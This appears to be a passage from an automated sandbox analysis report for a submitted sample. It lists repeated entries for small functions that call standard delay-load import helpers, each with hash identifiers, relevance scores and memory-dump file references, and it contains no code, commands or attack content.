API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cb94285b00c50188f6fb79fbfe279636cae2ac77f5c057f2c047f26334247726
Instruction ID: 4ede40f938d568495201bf31cbf75e654e774daea10683b16206fbff8f36ea9d
Opcode Fuzzy Hash: cb94285b00c50188f6fb79fbfe279636cae2ac77f5c057f2c047f26334247726
Instruction Fuzzy Hash: 7BB0128935C303FD310453485C02DFF060CD1C0B10331C43FF40AC1280D4406C090031

Function 00DB06A1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c75513654ead045dfe08e83d2df0e954cf7ee8601ba3f6e92249781b05cd4331
Instruction ID: ec5908779aad165cc595bc0226301a7eebf728722ab170d80801eaea2c7cab02
Opcode Fuzzy Hash: c75513654ead045dfe08e83d2df0e954cf7ee8601ba3f6e92249781b05cd4331
Instruction Fuzzy Hash: 1BB0128536C303FD31045348AC02DFF061CD1D0B10331C53FF00AC1180D4405C0A0031

Function 00DB067C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dbdbe2c42bd816ba271abf5ad26c8f7405eaa58f924c988769bd0c17fe3d1b52
Instruction ID: 1e97a927bf04f5520a787af4b193200cc00eb23ab9707861d43670b23793775b
Opcode Fuzzy Hash: dbdbe2c42bd816ba271abf5ad26c8f7405eaa58f924c988769bd0c17fe3d1b52
Instruction Fuzzy Hash: 54B0128535C207FE321413445C02CFF060CD1C0B10331C53FF006C00C094405C090031

Function 00DB075F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d67cf1d27b1600b22b291d5ea4f9a21f3f54037aaacca8ad9820d39bedea01a1
Instruction ID: 08254c1928e34fb8180de9ed88494f7a31079767de33317ee6aa3045ec1cdf2d
Opcode Fuzzy Hash: d67cf1d27b1600b22b291d5ea4f9a21f3f54037aaacca8ad9820d39bedea01a1
Instruction Fuzzy Hash: 47B0129535C203FD310453485D02DFF068CC1C0B10331C47FF80AC1180D4405D1A4031

Function 00DB0719 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ea6d88b9c5729fbe3551b2034b53864b37e9524a8413fcd876771e287903637b
Instruction ID: ad888fecaf8c007d4ca2f7cdf1715bdf21b0d1d0d75e82d37d5627651025e9f8
Opcode Fuzzy Hash: ea6d88b9c5729fbe3551b2034b53864b37e9524a8413fcd876771e287903637b
Instruction Fuzzy Hash: 8FB0129535C203FD310453495C02DFF060CD1C0B10331D47FF00AC1180D4405E090031

Function 00DB070F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6b1f19a9c5948c2253676e1450aa3e0d3df7cef6dd4303645b4225296f04a073
Instruction ID: e56fd88fd933effa18b8ad096f4531ca2c385df93d970e5c57faa175df3424d4
Opcode Fuzzy Hash: 6b1f19a9c5948c2253676e1450aa3e0d3df7cef6dd4303645b4225296f04a073
Instruction Fuzzy Hash: 9FB0129535C203FD310453485D02DFF060CC1C0B10331D47FF40AC1184D4405F1A0031

Function 00DB072D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 98244a0eed3582fb4c2cf0062cd2225c7ef7b4b661077a8f4fb6624318ff7ef7
Instruction ID: b19863e90c7f81abd8398406b9c2f69c692fd3e2d8c407c49d7cb94d660722e2
Opcode Fuzzy Hash: 98244a0eed3582fb4c2cf0062cd2225c7ef7b4b661077a8f4fb6624318ff7ef7
Instruction Fuzzy Hash: 8EB0129535D703FD328453485C02DFF060DC1C0B10331C53FF00AC1180D4405C990031

Function 00DB08CE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5ec21216f60dabdefd8f26b9ae830cac3e97293750c83de07e1a4e19028f823e
Instruction ID: 865160b5c5e65c0eb6132da2a3c44bc12de5829c1110a45d0f633b37d4fe9182
Opcode Fuzzy Hash: 5ec21216f60dabdefd8f26b9ae830cac3e97293750c83de07e1a4e19028f823e
Instruction Fuzzy Hash: 44B0129639C105FC310873885C03EFB0A1CE5C0B10330C42EF00AC1281D8405C440171

Function 00DB08C4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 27cdfeb45ec7aa575570cce673b541d1e8f2c375246edd5d7ed0bab50a1b2b49
Instruction ID: d00951d12cc973d5317ea444ec7fa04dd79ed3a1d7f8c06ce738244d9f390e94
Opcode Fuzzy Hash: 27cdfeb45ec7aa575570cce673b541d1e8f2c375246edd5d7ed0bab50a1b2b49
Instruction Fuzzy Hash: 62B0129635C201FC320873885C03DFB0A1CD5C0B10330C52EF00AC12C1D8405C884071

Function 00DB08F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d76033b18f0c1f80cba06008cc560b50e72860175156e7623891fcd73c188308
Instruction ID: a33f51efb436cc99003d72ab651ec013a9064fd90e62a35eac2c2cb7e23ed96a
Opcode Fuzzy Hash: d76033b18f0c1f80cba06008cc560b50e72860175156e7623891fcd73c188308
Instruction Fuzzy Hash: 0FB0129636C001FC31087388AC02EFB0A1CD5C0B10330C62FF00AC1181D8405C450075

Function 00DB09EA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b9870e08a5420682e27fb31a23d6789199b497ba504d5bbcf3532145df281663
Instruction ID: dc75ec4ee926afcb3a36920801457978fa05794eb44ba268033babd875f1af69
Opcode Fuzzy Hash: b9870e08a5420682e27fb31a23d6789199b497ba504d5bbcf3532145df281663
Instruction Fuzzy Hash: 76B012C679C002FC35041348ED02CF7051DCDC0B18330C57EF102D40829C517C050031

Function 00DB0A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 555d2f60da3748f917ca3d20b3940865cc25e81f1971961d3a0d5ce266276d93
Instruction ID: bb500b2c834e9234a5e8a6a081489c254cd9487cd673028e93574a9028aaf6ae
Opcode Fuzzy Hash: 555d2f60da3748f917ca3d20b3940865cc25e81f1971961d3a0d5ce266276d93
Instruction Fuzzy Hash: 4DB012C13DC201FC330453989C12DFB054DD1C0B10330D86EF446C2180D8406C0D0031

Function 00DB0A84 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1df0c178378b236b979ad4a7fc95f06c6eff41e82406f47275f8435ba6160ca5
Instruction ID: 5e79ce6b28c107797c72ed95bac94a9c2e594d1f1b9584da516ccc19ca4d8e19
Opcode Fuzzy Hash: 1df0c178378b236b979ad4a7fc95f06c6eff41e82406f47275f8435ba6160ca5
Instruction Fuzzy Hash: EFB012C13EC301FC334453989C12DFB054DD1C0B10330D92EF046C1180D8406C4D0031

Function 00DB0A70 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8c63c3ac906fa1895cf0ad0f09fe2eed0e42a646c66d78947f5e4696b9c0b99e
Instruction ID: 6df164a224f90d06abc0bcb608580433ea9286b506193127e9bf0e9e60fb6368
Opcode Fuzzy Hash: 8c63c3ac906fa1895cf0ad0f09fe2eed0e42a646c66d78947f5e4696b9c0b99e
Instruction Fuzzy Hash: 13B012C13DC201EC32045398DD12DFB055DD1C0B14330D87EF446C1180D8416C0F4031

Function 00DB0A0F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cce3adfd34d85bff1152db80856119d24098f49fb50bb8533b22ef49cf0c00ea
Instruction ID: fb986222fb3b96a44f8000b3ca5fe2daae5251447b29e2b01fb7ffe153db8eee
Opcode Fuzzy Hash: cce3adfd34d85bff1152db80856119d24098f49fb50bb8533b22ef49cf0c00ea
Instruction Fuzzy Hash: F1B012C139C001EC35045358ED02DF7052DC5C4B14330C57EF106C1281D8417C094131

Function 00DB0A05 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 377000972a477920398964572efa2ea60c99e83460c083264c3ed231864b9038
Instruction ID: 8fa91068310fb87a9b4d80f01d6c66d8c62441a29ff4b67668f5e591ecd2946b
Opcode Fuzzy Hash: 377000972a477920398964572efa2ea60c99e83460c083264c3ed231864b9038
Instruction Fuzzy Hash: 2FB012C139C101EC36045358EC02DF7092DC5C4B14330C63EF006C13C1D8417C4C0131

Function 00DB0A23 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dca7d5ea524e9a9bdd40397712d2b62a5b4c7eaeedb7f84401d485b06d33e306
Instruction ID: 5b8dbd825ea7c4ec4e2a4b1093ba9062d0b6e9196ed06d6e002f5bb3ab44c0f2
Opcode Fuzzy Hash: dca7d5ea524e9a9bdd40397712d2b62a5b4c7eaeedb7f84401d485b06d33e306
Instruction Fuzzy Hash: 7AB012C139C001FC35045348AC02DF7052DC5C4B10330C57EF406C2181D8407C080131

Function 00DB06C4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
